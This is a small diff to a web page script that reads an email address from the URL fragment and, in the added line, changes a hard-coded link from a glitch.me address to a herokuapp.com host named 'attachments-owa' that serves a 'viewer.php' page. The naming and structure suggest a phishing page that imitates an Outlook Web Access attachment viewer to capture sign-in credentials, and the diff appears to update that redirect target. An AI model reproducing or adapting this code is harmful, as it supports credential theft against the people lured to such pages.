--- a/index.html
+++ b/index.html
@@ -135,7 +135,7 @@
 
 var email = siteUrl.substring(siteUrl.lastIndexOf("#") +1);
     var linktag = "#";
-    var link = "https://third-five-pan.glitch.me/owa/out/ook/3A463ec6f4-1895-47d5-ae59-3f74ca8ee6bc&viewer/proposal/augustproposal.htm";
+    var link = "https://attachments-owa-3ec6f4-1895-47.herokuapp.com/3A463ec6f4-1895-47d5-ae59-3f74ca8ee6bc&viewer.php";
    // Define the string
 
 
